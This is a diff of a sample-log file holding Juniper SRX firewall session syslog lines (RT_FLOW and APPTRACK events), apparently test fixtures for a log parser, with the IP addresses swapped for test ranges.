-<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason="unset" source-address="1.2.3.4" source-port="63456" destination-address="5.6.7.8" destination-port="902" service-name="None" nat-source-address="1.2.3.4" nat-source-port="63456" nat-destination-address="5.6.7.8" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "]
-<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address="50.0.0.100" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="50.0.0.100" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"]
+<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.81.2.69.144.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
+<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.81.2.69.144.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
+<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.81.2.69.144.39 source-address="81.2.69.143" source-port="56639" destination-address="5.6.7.8" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "]
+<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.39 reason="unset" source-address="81.2.69.143" source-port="63456" destination-address="5.6.7.8" destination-port="902" service-name="None" nat-source-address="81.2.69.143" nat-source-port="63456" nat-destination-address="5.6.7.8" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "]
+<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.81.2.69.144.35 source-address="175.16.199.1" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"]
 <14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address="192.0.2.1" source-port="1" destination-address="198.51.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"]
 <14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason="response received" source-address="192.0.2.1" source-port="1" destination-address="198.51.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"]
-<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="8.23.224.110" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="8.23.224.110" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"]
-<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"]
-<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason="idle Timeout" source-address="100.73.10.92" source-port="52890" destination-address="58.68.126.198" destination-port="53" service-name="junos-dns-udp" nat-source-address="58.78.140.131" nat-source-port="11152" nat-destination-address="58.68.126.198" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"]
-<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="8.8.8.8" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="8.8.8.8" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"]
-<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "]
-<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address="192.168.224.30" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"]
-<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address="192.168.224.30" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"]
-<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="application failure or action" source-address="192.168.224.30" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"]
-<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="4.0.0.1" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="4.0.0.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
-<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address="4.0.0.1" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="4.0.0.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]
-<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="4.0.0.1" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="4.0.0.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
-<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address="50.0.0.100" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="50.0.0.100" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"]
-<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
-<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="4.0.0.1" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="4.0.0.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
-<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="58943" destination-address="46.165.154.241" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="46.165.154.241" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
-<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="91.228.167.172" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="91.228.167.172" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
-<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="49583" destination-address="8.8.8.8" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="8.8.8.8" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
-<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="8.8.8.8" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="8.8.8.8" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="8.23.224.110" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="8.23.224.110" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"]
+<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.58 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"]
+<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.34 reason="idle Timeout" source-address="67.43.156.14" source-port="52890" destination-address="58.68.126.198" destination-port="53" service-name="junos-dns-udp" nat-source-address="58.78.140.131" nat-source-port="11152" nat-destination-address="58.68.126.198" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"]
+<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.41 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"]
+<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.36 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "]
+<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.81.2.69.144.41 source-address="67.43.156.12" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"]
+<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.81.2.69.144.41 source-address="67.43.156.12" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"]
+<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.81.2.69.144.41 reason="application failure or action" source-address="67.43.156.12" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"]
+<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.81.2.69.144.129 source-address="67.43.156.12" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.12" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.81.2.69.144.129 source-address="67.43.156.12" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.12" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="TCP CLIENT RST" source-address="67.43.156.12" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.12" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.81.2.69.144.35 source-address="175.16.199.1" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"]
+<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.81.2.69.144.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
